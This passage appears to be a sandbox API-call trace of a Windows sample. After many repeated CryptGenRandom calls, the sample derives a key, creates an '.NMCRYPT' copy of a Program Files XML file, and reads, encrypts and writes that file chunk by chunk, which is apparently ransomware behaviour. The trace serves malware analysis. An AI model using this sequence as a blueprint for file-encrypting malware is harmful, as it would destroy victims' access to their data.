dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.526] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.526] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.527] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0147.527] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.527] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad7b8) returned 1 [0147.527] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.527] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.527] wcslen (_String="\\\\?\\") returned 0x4 [0147.527] CryptDuplicateKey (in: hKey=0x9ad7b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad438) returned 1 [0147.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.527] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2532) returned 1 [0147.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.528] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.544] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.544] GetLastError () returned 0x0 [0147.544] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.545] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.545] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.545] GetLastError () returned 0x0 [0147.545] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.545] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.545] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.545] GetLastError () returned 0x0 [0147.545] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.545] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.546] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.546] GetLastError () returned 0x0 [0147.546] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.546] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.546] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, 